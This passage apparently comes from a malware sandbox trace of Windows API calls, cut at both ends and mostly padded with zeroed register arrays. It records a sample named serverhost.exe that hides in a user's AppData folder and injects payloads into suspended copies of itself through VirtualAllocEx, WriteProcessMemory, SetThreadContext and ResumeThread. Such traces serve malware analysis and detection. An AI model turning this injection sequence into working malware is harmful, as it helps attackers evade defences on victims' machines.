[454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0085.385] ResumeThread (hThread=0x3cc) returned 0x1 [0085.385] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0xffffffff) Thread: id = 76 os_tid = 0xc24 [0085.480] GetTickCount () returned 0x1cdb9 [0085.480] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9ddfa78, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.481] _snwprintf (in: _Dest=0x9ddf870, _Count=0x104, _Format="\"%s\" /scomma \"%s\"" | out: _Dest="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C571.tmp\"") returned 107 [0085.481] VirtualAlloc (lpAddress=0x0, dwSize=0x5b000, flAllocationType=0x3000, flProtect=0x4) returned 0x22d0000 [0085.484] WTSGetActiveConsoleSessionId () returned 0x1 [0085.484] WTSQueryUserToken (SessionId=0x1, phToken=0x9ddfc9c*=0x1d3b118) returned 0 [0085.484] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C571.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x9ddf808*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x9ddfc84 | out: lpCommandLine="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C571.tmp\"", lpProcessInformation=0x9ddfc84*(hProcess=0x3e0, hThread=0x3e4, dwProcessId=0xc64, dwThreadId=0xc68)) returned 1 [0085.567] VirtualQueryEx (in: hProcess=0x3e0, lpAddress=0x400000, lpBuffer=0x9ddf82c, dwLength=0x1c | out: lpBuffer=0x9ddf82c*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x840000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0085.567] VirtualAllocEx (hProcess=0x3e0, lpAddress=0x400000, dwSize=0x5b000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0085.572] GetThreadContext (in: hThread=0x3e4, lpContext=0x9ddf560 | out: lpContext=0x9ddf560*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffd4000, Edx=0x0, Ecx=0x0, Eax=0xc41d90, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0085.572] IsWow64Process (in: hProcess=0x3e0, Wow64Process=0x9ddf84c | out: Wow64Process=0x9ddf84c) returned 1 [0085.573] WriteProcessMemory (in: hProcess=0x3e0, lpBaseAddress=0x400000, lpBuffer=0x22d0000*, nSize=0x5b000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x22d0000*, lpNumberOfBytesWritten=0x0) returned 1 [0085.580] WriteProcessMemory (in: hProcess=0x3e0, lpBaseAddress=0x7ffd4008, lpBuffer=0x9ddf850*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x9ddf850*, lpNumberOfBytesWritten=0x0) returned 1 [0085.581] SetThreadContext (hThread=0x3e4, lpContext=0x9ddf560*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffd4000, Edx=0x0, Ecx=0x0, Eax=0x443a06, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0085.581] ResumeThread (hThread=0x3e4) returned 0x1 [0085.584] WaitForSingleObject (hHandle=0x3e0, dwMilliseconds=0xffffffff) returned 0x0 [0088.652] CloseHandle (hObject=0x3e0) returned 1 [0088.652] CloseHandle (hObject=0x3e4) returned 1 [0088.652] CloseHandle (hObject=0x0) returned 0 [0088.652] VirtualFree (lpAddress=0x22d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.654] GetTickCount () returned 0x1d9ca [0088.667] GetTickCount () returned 0x1d9da Thread: id = 77 os_tid = 0xc28 Thread: id = 78 os_tid = 0xc2c Thread: id = 79 os_tid = 0xc30 [0082.579] GetTickCount () returned 0x1c264 [0083.578] GetTickCount () returned 0x1c64a [0085.418] GetTickCount () returned 0x1cd7b [0085.418] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x242f7e0, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.418] _snwprintf (in: _Dest=0x242f5d8, _Count=0x104, _Format="\"%s\" \"%s\"" | out: _Dest="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"") returned 99 [0085.418] VirtualAlloc (lpAddress=0x0, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0085.420] WTSGetActiveConsoleSessionId () returned 0x1 [0085.420] WTSQueryUserToken (SessionId=0x1, phToken=0x242fa04*=0x1fbb110) returned 0 [0085.420] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x242f570*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x242f9ec | out: lpCommandLine="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"", lpProcessInformation=0x242f9ec*(hProcess=0x3d4, hThread=0x3d8, dwProcessId=0xc58, dwThreadId=0xc5c)) returned 1 [0085.421] VirtualQueryEx (in: hProcess=0x3d4, lpAddress=0x400000, lpBuffer=0x242f594, dwLength=0x1c | out: lpBuffer=0x242f594*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x840000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0085.421] VirtualAllocEx (hProcess=0x3d4, lpAddress=0x400000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0085.426] GetThreadContext (in: hThread=0x3d8, lpContext=0x242f2c8 | out: lpContext=0x242f2c8*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, 